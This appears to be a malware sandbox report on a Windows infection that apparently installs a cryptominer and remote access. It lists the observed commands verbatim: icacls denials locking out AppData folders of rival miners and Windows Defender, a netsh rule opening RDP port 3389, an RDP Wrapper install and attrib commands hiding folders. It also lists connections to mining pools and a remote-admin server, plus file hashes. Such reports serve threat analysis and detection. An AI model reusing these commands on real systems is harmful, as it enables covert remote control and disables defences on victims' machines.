C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\PCBooster /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\generictools /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\unityp /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\PCBooster /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\AMD /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\unityp /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\AMD /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xmarin /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\xmarin /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\comdev /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wupdate /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\monotype /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\comdev /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\wupdate /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xpon /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\xpon /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\monotype /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wmipr /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\kara /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\wmipr /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\syslog /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\kara /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\temp\wup /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\syslog /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\temp\wup /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\geckof /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\initwin /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\geckof /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\packagest /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\initwin /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\packagest /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\subdir /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\syscore /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\subdir /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\windowscore /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\syscore /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Macromedia /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\windowscore /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft software /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Macromedia /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft software /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\coretempapp /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\kryptex /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\kryptex /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\coretempapp /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\system /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\system /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\gplyra /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\intel /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\gplyra /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\intel /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\app /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Windows_x64_nheqminer-5c /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\app /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\isminer /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Windows_x64_nheqminer-5c /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemcare /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\SIVapp /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\systemcare /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\isminer /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\kyubey /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\SIVapp /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\kyubey /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\NSCPUCNMINER /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\performance /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\NSCPUCNMINER /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\windows\system /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\performance /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\performance /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\windows\system /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\AudioHDriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\performance /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\AudioHDriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\bvhost /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\GoogleSoftware /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\bvhost /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\setupsk /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\GoogleSoftware /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Svcms /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\crmsvc /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\setupsk /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Svcms /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\crmsvc /deny Admin:(OI)(CI)(F)
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\users\john"
C:\Windows\system32\taskeng.exe
taskeng.exe {90E3BEB8-5991-46C4-B1FF-81344D55E145} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 194.67.198.139:21 | | tcp |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
| US | 8.8.8.8:53 | kaen.progaming-cheats.ru | udp |
| UA | 185.13.5.48:80 | kaen.progaming-cheats.ru | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.40:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.76.57:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
Files
C:\ProgramData\Microsoft\Intel\Cheat.exe
| MD5 | b9d686e28cae6847ff0cae312f820509 |
| SHA1 | 53af47ab5eb4d1d68d380a7efd9c64cc772b4235 |
| SHA256 | abc359397b8c978490ae5bc15ce1edd8250df5f3205dd00c3857dd6716445d11 |
| SHA512 | 985ff2b2062101de5ab60f6109dc20b16d54c6b06059d789daf4fc78033fd71deefc25787bd4602397310c89f3397e099f4959a60349abb8cff6b82b8b211e1a |
\ProgramData\Microsoft\Intel\Logs.exe
| MD5 | 32942d3c314bbdf1620cd88103041704 |
| SHA1 | 30d0e5acd4cd2d564fc0238bbd6b2817429a1d21 |
| SHA256 | a5db8a2bfa0de0450b68df20d485031b84ff1bc05870635614c1753668ea62a4 |
| SHA512 | 96a50e3ac5209ccf9e98a1489ee5e48c4b3643e5f29ecc0ad4a7ea5fe9d2db2c20969cd599b071833e5ecca6ce01b89416cd0a9555416aa475cc23a69f682c02 |
C:\ProgramData\Microsoft\Intel\L.bat
| MD5 | 6d744b6b4f26582054765190f2a48fc4 |
| SHA1 | f8389be05be2dcbe7b805048d47366da34e654bb |
| SHA256 | 5cec12c6eb8148a88120e020c5a8ec694e1d2b00d88965cb77ce85c936012b7a |
| SHA512 | 95dbf7a2845dfc307ac208c65baff017f65663f0ff8e4ce27100f2ab7c2fdb5a008148eb5f80a25eb2e91f117817a71e1a947114163b75c3948a33cc00135abc |
\ProgramData\Microsoft\Intel\winit.exe
| MD5 | d2a13f45e422348e79683468f2d72f48 |
| SHA1 | a4a5fd1e42499123f6fc7a6995a88707efbec8a8 |
| SHA256 | 9ed880c9e5219168275ea143b4e2e526ff765f4e5c7c7b43224cb8f5cbbbc9aa |
| SHA512 | 6ecd9cb874f724aea6d63dfa031dd28c3ccd0c07c31088b57701902cd397e04e7dc97b4bbde515e80c043840a71728b899b3729bfb5dc001c4166c3442154513 |
C:\ProgramData\Windows\winit.exe
| MD5 | 0ad9af59a50ebe8e71794c8d6d5b202f |
| SHA1 | 89a63d35581171ba9dff6451295988ff6d108ae9 |
| SHA256 | 5ce115d29377c45b23db067b3f5e77f46e96686b48e7ee4a5ad6e8d52ee5bf0e |
| SHA512 | a69be9e2a5c153dd0cc0783ff24de6a07a02758239979b411d397b7527c676ae9751b92978686999dff00d9c36d1bfbf5f3e9358a98fa6d375876e8a402d339a |
C:\Programdata\Windows\install.vbs
| MD5 | 5e36713ab310d29f2bdd1c93f2f0cad2 |
| SHA1 | 7e768cca6bce132e4e9132e8a00a1786e6351178 |
| SHA256 | cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931 |
| SHA512 | 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1 |
C:\Programdata\Windows\install.bat
| MD5 | e4d54fbfd7517dc5ca4297a811af79a7 |
| SHA1 | fc1bbcdfaa699340ac02a1fec087c2102d612d81 |
| SHA256 | 9abd59853172258f9eaf360933c13c27bd855e4c7b37840a8f75ea51b0826f3c |
| SHA512 | a5c678becf3c38fcf92dc93506bd252596c346a75a939436b8f2087ab3b5b3b72a577c668e11ff71078276f15ead06676dc6ed3f6d1e0c6df35a896c13989878 |
\ProgramData\Microsoft\Intel\svchost.exe
| MD5 | 70ad47ac024936a6bccfd95567c1edfa |
| SHA1 | e1bbe7726bf970c08c2125a54c78fd479e6995ed |
| SHA256 | 56a363311361e03dc395d274de67c2a64068df6b163389be80c7b6736ad0c5da |
| SHA512 | 7929024c6af401066a9afc23d4da42b906f293935bc1628aa0fe901fba46ae979de4cb7818a1bfae9532d9a810987fe5209dadb508d42e0495f294f4b10651b4 |
C:\Programdata\Windows\regedit.reg
| MD5 | 0a9de68d3dc8e3191ba1f6f7c9f195b3 |
| SHA1 | fabdedf2bc4a2417ac04048e5e736243838f40bd |
| SHA256 | d4919ef008472afe0d896f71be43ceeb1a6fe16da5f9c5ce82bda5c454c5fd1f |
| SHA512 | 22664679f30beef86bf7f4108f7965251dfdf05c56dc30b031d3cbd7b49935f37df5d32ea3aba921a6d2ca64ae7ac9ceca540efd28cece1d0b91524018e25c65 |
C:\programdata\microsoft\intel\P.exe
| MD5 | 4ef6e64af66845bcf9c1bd324e51517f |
| SHA1 | 8f56d5884dd44d875deee14654b081fc407490a7 |
| SHA256 | 5abc1e7138cd3f9ed1d61b6dd5d505c8898ae9cc7f49e0ee45b93be991f520c8 |
| SHA512 | e353f29636a51c5d379aaccf8354e75eaf2a4b90648f63e8becf6a7d9379f3e51bcb7584453e7b3697586396a5e650c12197dcfd7c04e23a3e7bbe011ad1d87c |
C:\ProgramData\Microsoft\rootsystem\P.exe
| MD5 | b78c384bff4c80a590f048050621fe87 |
| SHA1 | f006f71b0228b99917746001bc201dbfd9603c38 |
| SHA256 | 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b |
| SHA512 | 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab |
C:\programdata\microsoft\rootsystem\P.vbs
| MD5 | f014e69809bdf87b37697644a1d220d9 |
| SHA1 | 4ba0b73ae8a569e52acecf6b5c4c750fa4949d81 |
| SHA256 | c3931da2d007c38d897f2417972d64983a1c82fc6f1381590c3b93d9e794b6ee |
| SHA512 | e0254ee2317c2b375f66725d6c3ad32e9dd53167641cf677ca662f2727a0fa582905e5f7180ddbe686c1d485b889a6e0d2fa5c3052e295731795755ef3e6c299 |
C:\programdata\microsoft\rootsystem\1.exe
| MD5 | 622610a2cc797a4a41f5b212aa98bde0 |
| SHA1 | bfe47dce0d55df24aa5b6d59c442cf85c618176e |
| SHA256 | 7f11dabe46bf0af8973ce849194a587bd0ba1452e165faf028983f85b2b624c2 |
| SHA512 | 3c6d36666086ffe13a09e4decc4956b0b15888de0ae457dabe29ed7e1195ec145cd1adc61e48fd7dc6eb8f0c94b69d5e2fb04bf75d9e456be0ca11289516381b |
\ProgramData\Microsoft\Intel\R8.exe
| MD5 | 5f431f5ee701e752911ac4b7b164374c |
| SHA1 | 42109caf54679e668b792404157dd3ce9dec86de |
| SHA256 | 8dfda367599ca982201c273cebf8b7ae03ccdbdec269cf164e814b94b90d0f54 |
| SHA512 | 1af73a30b0e112b83ca1ea8bf3e822ccaa2bd6518be8e8f07f06a7441323efcd64168033d53989611f725e4f5f57ae10fc0ddc0e7a62dcae21110bc7edb34149 |
\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
C:\rdp\run.vbs
| MD5 | 6a5f5a48072a1adae96d2bd88848dcff |
| SHA1 | b381fa864db6c521cbf1133a68acf1db4baa7005 |
| SHA256 | c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe |
| SHA512 | d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c |
C:\rdp\pause.bat
| MD5 | a47b870196f7f1864ef7aa5779c54042 |
| SHA1 | dcb71b3e543cbd130a9ec47d4f847899d929b3d2 |
| SHA256 | 46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba |
| SHA512 | b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60 |
C:\ProgramData\Microsoft\Intel\winlog.exe
| MD5 | 4b2dbc48d42245ef50b975a7831e071c |
| SHA1 | 3aab9b62004f14171d1f018cf74d2a804d74ef80 |
| SHA256 | 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724 |
| SHA512 | f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd |
\ProgramData\Microsoft\Intel\winlogon.exe
| MD5 | 2f6a1bffbff81e7c69d8aa7392175a72 |
| SHA1 | 94ac919d2a20aa16156b66ed1c266941696077da |
| SHA256 | dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de |
| SHA512 | ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37 |
C:\ProgramData\SystemIdle.exe
| MD5 | 0bd6e68f3ea0dd62cd86283d86895381 |
| SHA1 | e207de5c580279ad40c89bf6f2c2d47c77efd626 |
| SHA256 | a18b0a31c87475be5d4dc8ab693224e24ae79f2845d788a657555cb30c59078b |
| SHA512 | 26504d31027ceac1c6b1e3f945e447c7beb83ff9b8db29d23e1d2321fc96419686773009da95ef6cd35245788f81e546f50f829d71c39e07e07e1fecbf2d8fd4 |
C:\Users\Admin\AppData\Local\Temp\aut34A3.tmp
| MD5 | 427c2b9f0563b700d3b2b86b4aaac822 |
| SHA1 | 34ae6f73ac9f4f463143cf2c993d8c88e6358f53 |
| SHA256 | fac97f4ba819d30670802676c4d149a13928ca093ef7e6aa1edd98b419144f22 |
| SHA512 | c487aa356c645dbd019a517741720f655301b9a55ab6a9e39665c1f7a0f2d5a5a1d734ea3c7d42c8822d6e3c00dc3c6d68bb556e5ef2c33e8daf422a70d473e7 |
C:\Users\Admin\AppData\Local\Temp\342A.tmp\342B.bat
| MD5 | cfc53d3f9b3716accf268c899f1b0ecb |
| SHA1 | 75b9ae89be46a54ed2606de8d328f81173180b2c |
| SHA256 | f293caa096cc51a511cedd76fd011a275fb8a30b6a93542ded718930a7d12ee9 |
| SHA512 | 0c090e2ed2f3f7b2c00cbb6583df5723a3d0781738eafc37b2e630f46b5b470a5a7dbc44a2f2e8d043f83c753ddf5f72b1d67c0a7e73241e47cd24c92b4ce7d4 |
C:\ProgramData\microsoft\Temp\5.xml
| MD5 | 487497f0faaccbf26056d9470eb3eced |
| SHA1 | e1be3341f60cfed1521a2cabc5d04c1feae61707 |
| SHA256 | 9a8efbd09c9cc1ee7e8ff76ea60846b5cd5a47cdaae8e92331f3b7b6a5db4be5 |
| SHA512 | 3c6b5b29c0d56cfd4b717a964fac276804be95722d78219e7087c4ec787566f223e24421e0e3e2d8a6df5f9c9a5c07f1935f4ba7a83a6a3efa84866e2c1405dd |
C:\ProgramData\Microsoft\Intel\Vegas.exe
| MD5 | 30582dfb10c2eb7deaaa1d99b527f064 |
| SHA1 | 0dda4940ede6a790ab51b21110017e47fe9e7521 |
| SHA256 | 6f833c0bf680e2c3d345f10619a872f78ede66871052e3501c5444333afcf70f |
| SHA512 | e920b8ea074f20041a048173a4378e1f93ab44facecbf3484a5e1392ec3b18e3745e20eb39a5968914811340eb49553f6bbc155a48fbce28e1ace3a079d78eb5 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | 2850badee11885b60758cb1ee660ee60 |
| SHA1 | 1940e47596e335e56590454cc3e94195edadbffc |
| SHA256 | eb72f90e32ca516131b0d058776743938e9ab5c0b10c60957eb8c14eb3956921 |
| SHA512 | 87df40e12d57befdd98d4352ed89e80df240546e8d95b0320e2cf707ae679c4c1af36be65cfc4199ac84a727b30cd325285519bc0929eab988340bcdf4249b38 |
